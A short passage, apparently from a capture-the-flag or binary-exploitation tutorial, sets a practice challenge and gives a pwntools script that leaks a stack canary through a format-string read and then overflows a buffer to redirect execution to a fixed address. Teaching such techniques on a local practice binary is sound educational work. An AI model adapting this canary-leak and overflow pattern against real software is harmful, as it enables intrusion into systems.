Ready to try one on your own? This challenge doesn't print a copy of the stack, meaning you'll need to use GDB to find your padding and leak the canary.
Here's the exploit for reference:
from pwn import * p = process('./chall') p.recvline() p.sendline(b'%15$p') canary = int(p.recvline().decode(), 16) payload = b'A' * 72 payload += p64(canary) payload += b'B' * 8 payload += p64(0x401016) # stack **alignment** payload += p64(0x401241) p.sendline(payload) p.interactive()